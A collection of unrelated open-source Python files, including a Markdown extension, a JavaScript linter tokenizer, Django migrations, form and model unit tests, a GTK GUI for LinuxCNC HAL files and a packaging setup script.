combined_stats['total/steps_per_second'] = mpi_mean(float(t) / float(duration))
combined_stats['total/episodes'] = mpi_mean(episodes)
combined_stats['total/epochs'] = epoch + 1
combined_stats['total/steps'] = t
for key in sorted(combined_stats.keys()):
logger.record_tabular(key, combined_stats[key])
logger.dump_tabular()
logger.info('')
logdir = logger.get_dir()
if rank == 0 and logdir:
if hasattr(env, 'get_state'):
with open(os.path.join(logdir, 'env_state.pkl'), 'wb') as f:
pickle.dump(env.get_state(), f)
if eval_env and hasattr(eval_env, 'get_state'):
with open(os.path.join(logdir, 'eval_env_state.pkl'), 'wb') as f:
pickle.dump(eval_env.get_state(), f)
|
nichit93/Implementation-of-TRED-in-ns-3 | refs/heads/master | src/internet-apps/bindings/callbacks_list.py | 240 | callback_classes = [
['void', 'ns3::Ptr<ns3::Socket>', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::Ptr<ns3::Socket>', 'unsigned int', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::Ptr<ns3::Socket>', 'ns3::Address const&', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['bool', 'ns3::Ptr<ns3::Socket>', 'ns3::Address const&', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::Address const&', 'ns3::NetDevice::PacketType', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['unsigned char', 'ns3::Ptr<ns3::QueueItem>', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
]
|
XiaosongWei/chromium-crosswalk | refs/heads/master | third_party/Python-Markdown/markdown/extensions/smart_strong.py | 123 | '''
Smart_Strong Extension for Python-Markdown
==========================================
This extension adds smarter handling of double underscores within words.
See <https://pythonhosted.org/Markdown/extensions/smart_strong.html>
for documentation.
Original code Copyright 2011 [Waylan Limberg](http://achinghead.com)
All changes Copyright 2011-2014 The Python Markdown Project
License: [BSD](http://www.opensource.org/licenses/bsd-license.php)
'''
from __future__ import absolute_import
from __future__ import unicode_literals
from . import Extension
from ..inlinepatterns import SimpleTagPattern
SMART_STRONG_RE = r'(?<!\w)(_{2})(?!_)(.+?)(?<!_)\2(?!\w)'
STRONG_RE = r'(\*{2})(.+?)\2'
class SmartEmphasisExtension(Extension):
""" Add smart_emphasis extension to Markdown class."""
def extendMarkdown(self, md, md_globals):
""" Modify inline patterns. """
md.inlinePatterns['strong'] = SimpleTagPattern(STRONG_RE, 'strong')
md.inlinePatterns.add(
'strong2',
SimpleTagPattern(SMART_STRONG_RE, 'strong'),
'>emphasis2'
)
def makeExtension(*args, **kwargs):
return SmartEmphasisExtension(*args, **kwargs)
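# Illustrative usage sketch (assuming the Python-Markdown package is installed;
# the input string is only an example): mid-word double underscores stay
# literal while a standalone __word__ is still emphasized.
#
#     import markdown
#     html = markdown.markdown(
#         'un__frigging__believable, but __this__ is strong',
#         extensions=[SmartEmphasisExtension()])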
|
chbfiv/fabric-engine-old | refs/heads/ver-1.1.0-alpha | Native/ThirdParty/Private/Python/closure_linter/common/tokenizer.py | 157 | #!/usr/bin/env python
#
# Copyright 2007 The Closure Linter Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Regular expression based lexer."""
__author__ = ('[email protected] (Robert Walker)',
'[email protected] (Andy Perelson)')
from closure_linter.common import tokens
# Shorthand
Type = tokens.TokenType
class Tokenizer(object):
"""General purpose tokenizer.
Attributes:
mode: The latest mode of the tokenizer. This allows patterns to distinguish
if they are mid-comment, mid-parameter list, etc.
matchers: Dictionary of modes to sequences of matchers that define the
patterns to check at any given time.
default_types: Dictionary of modes to types, defining what type to give
non-matched text when in the given mode. Defaults to Type.NORMAL.
"""
def __init__(self, starting_mode, matchers, default_types):
"""Initialize the tokenizer.
Args:
starting_mode: Mode to start in.
matchers: Dictionary of modes to sequences of matchers that defines the
patterns to check at any given time.
default_types: Dictionary of modes to types, defining what type to give
non-matched text when in the given mode. Defaults to Type.NORMAL.
"""
self.__starting_mode = starting_mode
self.matchers = matchers
self.default_types = default_types
def TokenizeFile(self, file):
"""Tokenizes the given file.
Args:
file: An iterable that yields one line of the file at a time.
Returns:
The first token in the file
"""
# The current mode.
self.mode = self.__starting_mode
# The first token in the stream.
self.__first_token = None
# The last token added to the token stream.
self.__last_token = None
# The current line number.
self.__line_number = 0
for line in file:
self.__line_number += 1
self.__TokenizeLine(line)
return self.__first_token
def _CreateToken(self, string, token_type, line, line_number, values=None):
"""Creates a new Token object (or subclass).
Args:
string: The string of input the token represents.
token_type: The type of token.
line: The text of the line this token is in.
line_number: The line number of the token.
values: A dict of named values within the token. For instance, a
function declaration may have a value called 'name' which captures the
name of the function.
Returns:
The newly created Token object.
"""
return tokens.Token(string, token_type, line, line_number, values)
def __TokenizeLine(self, line):
"""Tokenizes the given line.
Args:
line: The contents of the line.
"""
string = line.rstrip('\n\r\f')
line_number = self.__line_number
self.__start_index = 0
if not string:
self.__AddToken(self._CreateToken('', Type.BLANK_LINE, line, line_number))
return
normal_token = ''
index = 0
while index < len(string):
for matcher in self.matchers[self.mode]:
if matcher.line_start and index > 0:
continue
match = matcher.regex.match(string, index)
if match:
if normal_token:
self.__AddToken(
self.__CreateNormalToken(self.mode, normal_token, line,
line_number))
normal_token = ''
# Add the match.
self.__AddToken(self._CreateToken(match.group(), matcher.type, line,
line_number, match.groupdict()))
# Change the mode to the correct one for after this match.
self.mode = matcher.result_mode or self.mode
# Shorten the string to be matched.
index = match.end()
break
else:
# If the for loop finishes naturally (i.e. no matches) we just add the
# first character to the string of consecutive non match characters.
# These will constitute a NORMAL token.
if string:
normal_token += string[index:index + 1]
index += 1
if normal_token:
self.__AddToken(
self.__CreateNormalToken(self.mode, normal_token, line, line_number))
def __CreateNormalToken(self, mode, string, line, line_number):
"""Creates a normal token.
Args:
mode: The current mode.
string: The string to tokenize.
line: The line of text.
line_number: The line number within the file.
Returns:
A Token object, of the default type for the current mode.
"""
type = Type.NORMAL
if mode in self.default_types:
type = self.default_types[mode]
return self._CreateToken(string, type, line, line_number)
def __AddToken(self, token):
"""Add the given token to the token stream.
Args:
token: The token to add.
"""
# Store the first token, or point the previous token to this one.
if not self.__first_token:
self.__first_token = token
else:
self.__last_token.next = token
# Establish the doubly linked list
token.previous = self.__last_token
self.__last_token = token
# Compute the character indices
token.start_index = self.__start_index
self.__start_index += token.length
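# Illustrative sketch (not part of the original module): a "matcher" is any
# object exposing regex, type, line_start and result_mode attributes, so a
# minimal tokenizer can be assembled roughly like this (the mode name, pattern
# and the choice of Type.NORMAL are assumptions):
#
#     import collections
#     import re
#     Matcher = collections.namedtuple(
#         'Matcher', ['regex', 'type', 'line_start', 'result_mode'])
#     matchers = {'text': [Matcher(re.compile(r'\d+'), Type.NORMAL, False, None)]}
#     first_token = Tokenizer('text', matchers, {}).TokenizeFile(['has 42 in it\n'])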
|
grouan/udata | refs/heads/master | udata/tests/forms/test_current_user_field.py | 1 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from bson import ObjectId
from werkzeug.datastructures import MultiDict
from udata.auth import login_user
from udata.forms import ModelForm, fields
from udata.models import db, User
from udata.tests import TestCase
from udata.tests.factories import UserFactory, AdminFactory
class CurrentUserFieldTest(TestCase):
def factory(self, *args, **kwargs):
class Ownable(db.Document):
owner = db.ReferenceField(User)
class OwnableForm(ModelForm):
model_class = Ownable
owner = fields.CurrentUserField(*args, **kwargs)
return Ownable, OwnableForm
def test_empty_values(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
form = OwnableForm()
self.assertEqual(form.owner.data, user)
ownable = Ownable()
form.populate_obj(ownable)
self.assertEqual(ownable.owner, user)
def test_initial_value(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
ownable = Ownable(owner=user)
form = OwnableForm(None, ownable)
self.assertEqual(form.owner.data, user)
def test_with_valid_user_self(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
form = OwnableForm(MultiDict({
'owner': str(user.id)
}))
self.assertEqual(form.owner.data, user)
form.validate()
self.assertEqual(form.errors, {})
ownable = Ownable()
form.populate_obj(ownable)
self.assertEqual(ownable.owner, user)
def test_with_other_user(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
other = UserFactory()
login_user(user)
form = OwnableForm(MultiDict({
'owner': str(other.id)
}))
self.assertEqual(form.owner.data, other)
form.validate()
self.assertIn('owner', form.errors)
self.assertEqual(len(form.errors['owner']), 1)
def test_with_other_user_admin(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
admin = AdminFactory()
login_user(admin)
form = OwnableForm(MultiDict({
'owner': str(user.id)
}))
self.assertEqual(form.owner.data, user)
form.validate()
self.assertEqual(form.errors, {})
ownable = Ownable()
form.populate_obj(ownable)
self.assertEqual(ownable.owner, user)
def test_with_valid_user_self_json(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
form = OwnableForm.from_json({
'owner': str(user.id)
})
self.assertEqual(form.owner.data, user)
form.validate()
self.assertEqual(form.errors, {})
ownable = Ownable()
form.populate_obj(ownable)
self.assertEqual(ownable.owner, user)
def test_with_user_object_self_from_json(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
form = OwnableForm.from_json({
'owner': {'id': str(user.id)}
})
self.assertEqual(form.owner.data, user)
form.validate()
self.assertEqual(form.errors, {})
ownable = Ownable()
form.populate_obj(ownable)
self.assertEqual(ownable.owner, user)
def test_with_invalid_data(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
form = OwnableForm(MultiDict({
'owner': str('wrongwith12c')
}))
form.validate()
self.assertIn('owner', form.errors)
self.assertEqual(len(form.errors['owner']), 1)
def test_with_user_not_found(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
login_user(user)
form = OwnableForm(MultiDict({
'owner': str(ObjectId())
}))
form.validate()
self.assertIn('owner', form.errors)
self.assertEqual(len(form.errors['owner']), 1)
def test_with_user_not_logged_found(self):
Ownable, OwnableForm = self.factory()
user = UserFactory()
form = OwnableForm(MultiDict({
'owner': str(user.id)
}))
form.validate()
self.assertIn('owner', form.errors)
self.assertEqual(len(form.errors['owner']), 1)
|
narogon/linuxcnc | refs/heads/add-hal-ethercat | src/hal/utils/halgui/app.py | 38 |
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
import os, sys, gtk, gobject
from design import Design
from load import file_load, file_new
from save import file_save
def appquit(*args):
gtk.main_quit()
def open_file(action):
app.openfile()
def save_file(action):
if app.design.file_name:
file_save(app.design, app.design.file_name)
else:
app.savefile()
def save_file_as(action):
app.savefile()
def new_file(action):
file_new(app.design)
def refresh(action):
app.design.update()
menu_entries = (
("FileMenu", None, "_File"),
("New", gtk.STOCK_NEW, None, "<control>N",
"Create a new file", new_file),
("Open", gtk.STOCK_OPEN, None, "<control>O",
"Open an existing file", open_file),
("Save", gtk.STOCK_SAVE, None, "<control>S",
"Save file", save_file),
("Save as", gtk.STOCK_SAVE_AS, None, "<shift><control>S",
"Save file with new name", save_file_as),
("Quit", gtk.STOCK_QUIT, None, "<control>Q",
"Quit program", appquit),
("ViewMenu", None, "_View"),
("Refresh", gtk.STOCK_REFRESH, None, "<control>R",
"Refresh", refresh),
)
class Application(gtk.Window):
def __init__(self, parent=None):
global app
app = self
gtk.Window.__init__(self)
try:
self.set_screen(parent.get_screen())
except AttributeError:
self.connect('destroy', lambda *w: gtk.main_quit())
self.design = Design(self)
actions = gtk.ActionGroup("Actions")
actions.add_actions(menu_entries)
ui = gtk.UIManager()
ui.insert_action_group(actions, 0)
self.add_accel_group(ui.get_accel_group())
# better path to 'ui.xml' needed
uifile = os.path.join(os.path.dirname(sys.argv[0]), "ui.xml")
try:
mergeid = ui.add_ui_from_file(uifile)
except gobject.GError, msg:
print "error building menus: %s" % (msg)
box1 = gtk.VBox(False, 0)
self.add(box1)
box1.pack_start(ui.get_widget("/MenuBar"), False, False)
box1.pack_start(ui.get_widget("/ToolBar"), False, False)
box1.pack_start(self.design, True, True)
statusbar = gtk.Statusbar()
box1.pack_start(statusbar, False, False)
self.set_default_size(1024, 768)
self.settitle()
self.set_border_width(0)
def show_app(self):
self.show_all()
def settitle(self):
if self.design.file_name:
self.set_title("Crapahalic - " + self.design.file_name)
else:
self.set_title("Crapahalic")
def openfile(self):
dialog = gtk.FileChooserDialog(title="Open...", action=gtk.FILE_CHOOSER_ACTION_OPEN,
buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_OPEN,gtk.RESPONSE_OK))
dialog.set_default_response(gtk.RESPONSE_OK)
hal_filter = gtk.FileFilter()
hal_filter.set_name("craphal files")
hal_filter.add_pattern("*.hal")
dialog.add_filter(hal_filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
new_file(None)
file_load(app.design, dialog.get_filename())
dialog.destroy()
def savefile(self):
dialog = gtk.FileChooserDialog(title="Save...", action=gtk.FILE_CHOOSER_ACTION_SAVE,
buttons=(gtk.STOCK_CANCEL,gtk.RESPONSE_CANCEL,gtk.STOCK_SAVE,gtk.RESPONSE_OK))
dialog.set_default_response(gtk.RESPONSE_OK)
hal_filter = gtk.FileFilter()
hal_filter.set_name("craphal files")
hal_filter.add_pattern("*.hal")
dialog.add_filter(hal_filter)
response = dialog.run()
if response == gtk.RESPONSE_OK:
file_save(app.design, dialog.get_filename())
dialog.destroy()
|
frigg/frigg-test-discovery | refs/heads/master | setup.py | 1 | # -*- encoding: utf8 -*-
import sys
from setuptools import setup
import frigg_test_discovery
def _read_long_description():
try:
import pypandoc
return pypandoc.convert('README.md', 'rst', format='markdown')
except Exception:
return None
version = frigg_test_discovery.__version__
try:
from semantic_release import setup_hook
setup_hook(sys.argv)
except ImportError:
pass
setup(
name='frigg-test-discovery',
version=version,
description='Test discovery util for frigg-worker',
long_description=_read_long_description(),
author='The frigg team',
author_email='[email protected]',
license='MIT',
url='https://github.com/frigg/frigg-test-discovery',
py_modules=['frigg_test_discovery'],
include_package_data=True,
classifiers=[
'Programming Language :: Python :: 3',
]
)
|
apigee/edx-platform | refs/heads/master | lms/djangoapps/django_comment_client/migrations/0001_initial.py | 188 | # -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Role'
db.create_table('django_comment_client_role', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('name', self.gf('django.db.models.fields.CharField')(max_length=30)),
('course_id', self.gf('django.db.models.fields.CharField')(db_index=True, max_length=255, blank=True)),
))
db.send_create_signal('django_comment_client', ['Role'])
# Adding M2M table for field users on 'Role'
db.create_table('django_comment_client_role_users', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('role', models.ForeignKey(orm['django_comment_client.role'], null=False)),
('user', models.ForeignKey(orm['auth.user'], null=False))
))
db.create_unique('django_comment_client_role_users', ['role_id', 'user_id'])
# Adding model 'Permission'
db.create_table('django_comment_client_permission', (
('name', self.gf('django.db.models.fields.CharField')(max_length=30, primary_key=True)),
))
db.send_create_signal('django_comment_client', ['Permission'])
# Adding M2M table for field roles on 'Permission'
db.create_table('django_comment_client_permission_roles', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('permission', models.ForeignKey(orm['django_comment_client.permission'], null=False)),
('role', models.ForeignKey(orm['django_comment_client.role'], null=False))
))
db.create_unique('django_comment_client_permission_roles', ['permission_id', 'role_id'])
def backwards(self, orm):
# Deleting model 'Role'
db.delete_table('django_comment_client_role')
# Removing M2M table for field users on 'Role'
db.delete_table('django_comment_client_role_users')
# Deleting model 'Permission'
db.delete_table('django_comment_client_permission')
# Removing M2M table for field roles on 'Permission'
db.delete_table('django_comment_client_permission_roles')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'about': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'avatar_type': ('django.db.models.fields.CharField', [], {'default': "'n'", 'max_length': '1'}),
'bronze': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'consecutive_days_visit_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'country': ('django_countries.fields.CountryField', [], {'max_length': '2', 'blank': 'True'}),
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'display_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'email_isvalid': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'email_key': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'email_tag_filter_strategy': ('django.db.models.fields.SmallIntegerField', [], {'default': '1'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'gold': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'gravatar': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ignored_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'interesting_tags': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'last_seen': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'location': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'new_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'questions_per_page': ('django.db.models.fields.SmallIntegerField', [], {'default': '10'}),
'real_name': ('django.db.models.fields.CharField', [], {'max_length': '100', 'blank': 'True'}),
'reputation': ('django.db.models.fields.PositiveIntegerField', [], {'default': '1'}),
'seen_response_count': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'show_country': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'silver': ('django.db.models.fields.SmallIntegerField', [], {'default': '0'}),
'status': ('django.db.models.fields.CharField', [], {'default': "'w'", 'max_length': '2'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'django_comment_client.permission': {
'Meta': {'object_name': 'Permission'},
'name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'primary_key': 'True'}),
'roles': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'permissions'", 'symmetrical': 'False', 'to': "orm['django_comment_client.Role']"})
},
'django_comment_client.role': {
'Meta': {'object_name': 'Role'},
'course_id': ('django.db.models.fields.CharField', [], {'db_index': 'True', 'max_length': '255', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '30'}),
'users': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'roles'", 'symmetrical': 'False', 'to': "orm['auth.User']"})
}
}
complete_apps = ['django_comment_client']
|
feer56/Kitsune2 | refs/heads/master | kitsune/customercare/tests/test_models.py | 17 | from nose.tools import eq_, raises
from kitsune.customercare.models import Tweet
from kitsune.customercare.tests import tweet
from kitsune.sumo.tests import TestCase
class TweetTests(TestCase):
"""Tests for the Tweet model"""
def test_latest(self):
"""Test the latest() class method when there is a latest tweet."""
NUM = 2
for x in xrange(NUM):
last = tweet(save=True)
eq_(last.tweet_id, Tweet.latest().tweet_id)
@raises(Tweet.DoesNotExist)
def test_latest_does_not_exist(self):
"""latest() should throw DoesNotExist when there are no tweets."""
Tweet.latest()
|
sahiljain/catapult | refs/heads/master | telemetry/telemetry/internal/results/progress_reporter.py | 52 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
class ProgressReporter(object):
"""A class that reports progress of a benchmark.
The reporter produces output whenever a significant event happens
during the progress of a benchmark, including (but not limited to):
when a page run is started, when a page run finished, any failures
during a page run.
The default implementation outputs nothing.
"""
def DidAddValue(self, value):
pass
def WillRunPage(self, page_test_results):
pass
def DidRunPage(self, page_test_results):
pass
def DidFinishAllTests(self, page_test_results):
pass
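# Illustrative sketch (not part of the original module): a concrete reporter
# overrides only the hooks it needs, e.g. a minimal console reporter:
#
#     class PrintingProgressReporter(ProgressReporter):
#         def WillRunPage(self, page_test_results):
#             print 'starting a page run'
#         def DidRunPage(self, page_test_results):
#             print 'finished a page run'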
|